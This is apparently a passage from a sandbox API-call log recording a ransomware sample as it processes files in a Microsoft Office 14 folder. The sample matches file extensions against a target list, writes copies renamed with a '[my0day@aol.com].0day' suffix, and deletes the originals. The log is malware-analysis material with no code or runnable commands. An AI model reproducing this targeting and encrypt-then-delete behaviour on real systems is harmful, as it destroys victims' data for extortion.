100 [0039.031] lstrlenW (lpString=".1cd") returned 4 [0039.031] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0039.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0039.031] lstrlenW (lpString=".jpg") returned 4 [0039.031] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0039.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0039.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0039.031] lstrlenW (lpString=".doc") returned 4 [0039.031] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0039.031] lstrlenW (lpString=".docx") returned 5 [0039.031] lstrcmpiW (lpString1=".docx", lpString2="T.CHM") returned -1 [0039.031] lstrlenW (lpString=".pdf") returned 4 [0039.031] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0039.031] lstrlenW (lpString=".xls") returned 4 [0039.031] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0039.031] lstrlenW (lpString=".xlsx") returned 5 [0039.031] lstrcmpiW (lpString1=".xlsx", lpString2="T.CHM") returned -1 [0039.031] lstrlenW (lpString=".ppt") returned 4 [0039.031] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0039.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0039.031] lstrlenW (lpString=".zip") returned 4 [0039.031] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0039.031] lstrlenW (lpString=".rar") returned 4 [0039.032] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0039.032] lstrlenW (lpString=".bz2") returned 4 [0039.032] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0039.032] lstrlenW (lpString=".7z") returned 3 [0039.032] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0039.032] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0039.032] lstrlenW (lpString=".dbf") returned 4 [0039.032] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0039.032] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0039.032] lstrlenW (lpString=".1cd") returned 4 [0039.032] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0039.032] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0039.032] lstrlenW (lpString=".jpg") returned 4 [0039.032] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0039.032] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0039.032] lstrlenW (lpString="OfficeMUISet.XML") returned 16 [0039.032] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0039.032] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=819) returned 1 [0039.032] CloseHandle (hObject=0x1c4) returned 1 [0039.032] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml")) returned 0x20 [0039.033] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0039.033] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0039.033] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.033] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.033] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0039.033] GetLastError () returned 0x0 [0039.033] ReadFile (in: hFile=0x1c4, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x333, lpOverlapped=0x0) returned 1 [0039.034] WriteFile (in: hFile=0x1f4, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x340, lpOverlapped=0x0) returned 1 [0039.035] ReadFile (in: hFile=0x1c4, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0039.035] WriteFile (in: hFile=0x1f4, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xf4, lpOverlapped=0x0) returned 1 [0039.035] SetEndOfFile (hFile=0x1f4) returned 1 [0039.035] CloseHandle (hObject=0x1f4) returned 1 [0039.036] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.036] SetEndOfFile (hFile=0x1c4) returned 1 [0039.037] CloseHandle (hObject=0x1c4) returned 1 [0039.037] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0039.037] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml")) returned 1 [0039.037] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0039.037] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0039.037] lstrlenW (lpString=".doc") returned 4 [0039.037] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.037] lstrlenW (lpString=".docx") returned 5 [0039.037] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1 [0039.038] lstrlenW (lpString=".pdf") returned 4 [0039.038] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.038] lstrlenW (lpString=".xls") returned 4 [0039.038] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.038] lstrlenW (lpString=".xlsx") returned 5 [0039.038] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1 [0039.038] lstrlenW (lpString=".ppt") returned 4 [0039.038] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0039.038] lstrlenW (lpString=".zip") returned 4 [0039.038] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.038] lstrlenW (lpString=".rar") returned 4 [0039.038] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.038] lstrlenW (lpString=".bz2") returned 4 [0039.038] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.038] lstrlenW (lpString=".7z") returned 3 [0039.038] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0039.038] lstrlenW (lpString=".dbf") returned 4 [0039.038] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0039.038] lstrlenW (lpString=".1cd") returned 4 [0039.038] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0039.038] lstrlenW (lpString=".jpg") returned 4 [0039.038] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0039.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0039.038] lstrlenW (lpString=".doc") returned 4 [0039.038] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.038] lstrlenW (lpString=".docx") returned 5 [0039.038] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1 [0039.038] lstrlenW (lpString=".pdf") returned 4 [0039.039] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.039] lstrlenW (lpString=".xls") returned 4 [0039.039] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.039] lstrlenW (lpString=".xlsx") returned 5 [0039.039] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1 [0039.039] lstrlenW (lpString=".ppt") returned 4 [0039.039] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0039.039] lstrlenW (lpString=".zip") returned 4 [0039.039] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.039] lstrlenW (lpString=".rar") returned 4 [0039.039] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.039] lstrlenW (lpString=".bz2") returned 4 [0039.039] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.039] lstrlenW (lpString=".7z") returned 3 [0039.039] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0039.039] lstrlenW (lpString=".dbf") returned 4 [0039.039] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0039.039] lstrlenW (lpString=".1cd") returned 4 [0039.039] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0039.039] lstrlenW (lpString=".jpg") returned 4 [0039.039] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.039] lstrcmpiW (lpString1=".CHM", lpString2=".0day") returned 1 [0039.039] lstrlenW (lpString="PSCONFIG.CHM") returned 12 [0039.039] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0039.040] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=37689) returned 1 [0039.040] CloseHandle (hObject=0x1c4) returned 1 [0039.040] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm")) returned 0x20 [0039.040] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0039.040] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0039.041] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.041] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.041] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0039.041] GetLastError () returned 0x0 [0039.041] ReadFile (in: hFile=0x1c4, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x9339, lpOverlapped=0x0) returned 1 [0039.043] WriteFile (in: hFile=0x1f4, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x9340, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x9340, lpOverlapped=0x0) returned 1 [0039.044] ReadFile (in: hFile=0x1c4, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0039.044] WriteFile (in: hFile=0x1f4, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0039.044] SetEndOfFile (hFile=0x1f4) returned 1 [0039.044] CloseHandle (hObject=0x1f4) returned 1 [0039.046] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.046] SetEndOfFile (hFile=0x1c4) returned 1 [0039.047] CloseHandle (hObject=0x1c4) returned 1 [0039.047] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0039.047] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm")) returned 1 [0039.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0039.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0039.047] lstrlenW (lpString=".doc") returned 4 [0039.047] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0039.047] lstrlenW (lpString=".docx") returned 5 [0039.047] lstrcmpiW (lpString1=".docx", lpString2="G.CHM") returned -1 [0039.047] lstrlenW (lpString=".pdf") returned 4 [0039.047] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0039.047] lstrlenW (lpString=".xls") returned 4 [0039.047] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0039.047] lstrlenW (lpString=".xlsx") returned 5 [0039.047] lstrcmpiW (lpString1=".xlsx", lpString2="G.CHM") returned -1 [0039.047] lstrlenW (lpString=".ppt") returned 4 [0039.047] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0039.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0039.048] lstrlenW (lpString=".zip") returned 4 [0039.048] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0039.048] lstrlenW (lpString=".rar") returned 4 [0039.048] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0039.048] lstrlenW (lpString=".bz2") returned 4 [0039.048] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0039.048] lstrlenW (lpString=".7z") returned 3 [0039.048] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0039.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0039.048] lstrlenW (lpString=".dbf") returned 4 [0039.048] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0039.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0039.048] lstrlenW (lpString=".1cd") returned 4 [0039.048] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0039.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0039.048] lstrlenW (lpString=".jpg") returned 4 [0039.048] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0039.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0039.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0039.048] lstrlenW (lpString=".doc") returned 4 [0039.048] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0039.048] lstrlenW (lpString=".docx") returned 5 [0039.048] lstrcmpiW (lpString1=".docx", lpString2="G.CHM") returned -1 [0039.048] lstrlenW (lpString=".pdf") returned 4 [0039.048] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0039.048] lstrlenW (lpString=".xls") returned 4 [0039.048] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0039.048] lstrlenW (lpString=".xlsx") returned 5 [0039.048] lstrcmpiW (lpString1=".xlsx", lpString2="G.CHM") returned -1 [0039.048] lstrlenW (lpString=".ppt") returned 4 [0039.048] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0039.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0039.048] lstrlenW (lpString=".zip") returned 4 [0039.049] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0039.049] lstrlenW (lpString=".rar") returned 4 [0039.049] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0039.049] lstrlenW (lpString=".bz2") returned 4 [0039.049] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0039.049] lstrlenW (lpString=".7z") returned 3 [0039.049] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0039.049] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0039.049] lstrlenW (lpString=".dbf") returned 4 [0039.049] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0039.049] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0039.049] lstrlenW (lpString=".1cd") returned 4 [0039.049] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0039.049] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0039.049] lstrlenW (lpString=".jpg") returned 4 [0039.049] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0039.049] lstrcmpiW (lpString1=".CHM", lpString2=".0day") returned 1 [0039.049] lstrlenW (lpString="PSS10O.CHM") returned 10 [0039.049] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0039.049] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=26929) returned 1 [0039.049] CloseHandle (hObject=0x1c4) returned 1 [0039.049] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm")) returned 0x20 [0039.050] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0039.050] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0039.050] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.050] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.050] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0039.050] GetLastError () returned 0x0 [0039.050] ReadFile (in: hFile=0x1c4, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x6931, lpOverlapped=0x0) returned 1 [0039.052] WriteFile (in: hFile=0x1f4, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x6940, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x6940, lpOverlapped=0x0) returned 1 [0039.053] ReadFile (in: hFile=0x1c4, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0039.053] WriteFile (in: hFile=0x1f4, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xe8, lpOverlapped=0x0) returned 1 [0039.053] SetEndOfFile (hFile=0x1f4) returned 1 [0039.053] CloseHandle (hObject=0x1f4) returned 1 [0039.054] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.054] SetEndOfFile (hFile=0x1c4) returned 1 [0039.055] CloseHandle (hObject=0x1c4) returned 1 [0039.055] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0039.055] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm")) returned 1 [0039.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0039.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0039.056] lstrlenW (lpString=".doc") returned 4 [0039.056] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0039.056] lstrlenW (lpString=".docx") returned 5 [0039.056] lstrcmpiW (lpString1=".docx", lpString2="O.CHM") returned -1 [0039.056] lstrlenW (lpString=".pdf") returned 4 [0039.056] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") 